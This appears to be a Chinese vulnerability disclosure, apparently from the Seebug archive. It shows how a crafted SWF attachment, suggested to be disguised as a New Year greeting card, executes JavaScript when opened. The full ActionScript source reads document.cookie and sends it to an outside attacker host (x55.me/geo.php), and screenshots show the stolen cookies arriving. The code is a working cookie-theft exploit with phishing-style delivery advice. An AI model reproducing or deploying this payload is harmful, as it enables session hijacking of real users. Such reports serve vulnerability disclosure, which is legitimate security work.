### 简要描述:
设计错误导致可执行恶意JavaScript代码并窃取用户cookies
### 详细说明:
将特制的swf文件作为附件发送给受害者(这里可以选择在过节的时候下手,比如将文件名改称新年贺卡.swf):
swf文件的AS代码如下(将就着看吧,东拼西凑整出来的):
[<img src="https://images.seebug.org/upload/201407/2315443934ea294aa78f284b9d06dc229bca3ca3.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/2315443934ea294aa78f284b9d06dc229bca3ca3.jpg)
```
package {
import flash.external.ExternalInterface;
import flash.display.Sprite;
import flash.display.Sprite;
import flash.events.Event;
import flash.net.URLLoader;
import flash.net.URLRequest;
import flash.text.TextField;
import flash.text.TextFieldAutoSize;
import flash.xml.*;
import flash.events.IOErrorEvent;
import flash.events.*;
import flash.net.*;
/**
* @author User
*/
public class csrf extends Sprite {
private var loader:URLLoader;
public function csrf() {
var res:String = ExternalInterface.call("function(){return document.cookie;}");
doGet(res);
}
private function doGet(res:String):void{
loader = new URLLoader();
var target:String = "http://x55.me/geo.php?get="+res;
var request:URLRequest = new URLRequest(target);
try {
loader.load(request);
} catch (error:Error) {
sendDatatoJS("Error: " + error.getStackTrace());
}
}
private function sendDatatoJS(data:String):void{
trace(data);
ExternalInterface.call("colsole.log", data);
}
}
}
```
受害者打开附件里的swf文件:
[<img src="https://images.seebug.org/upload/201407/2315445680e1d8b6f2a3d09d0dec0bc53ae47d45.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/2315445680e1d8b6f2a3d09d0dec0bc53ae47d45.jpg)
一旦受害者打开附件里的swf文件,其cookies就会发送到攻击者的站点:
[<img src="https://images.seebug.org/upload/201407/231545137642292a572d10c9e018cfc65ff559b0.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/231545137642292a572d10c9e018cfc65ff559b0.jpg)
### 漏洞证明:
附上收到的cookies:
[<img src="https://images.seebug.org/upload/201407/231545289127af6eb803867db7db641c101c1973.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/231545289127af6eb803867db7db641c101c1973.jpg)
暂无评论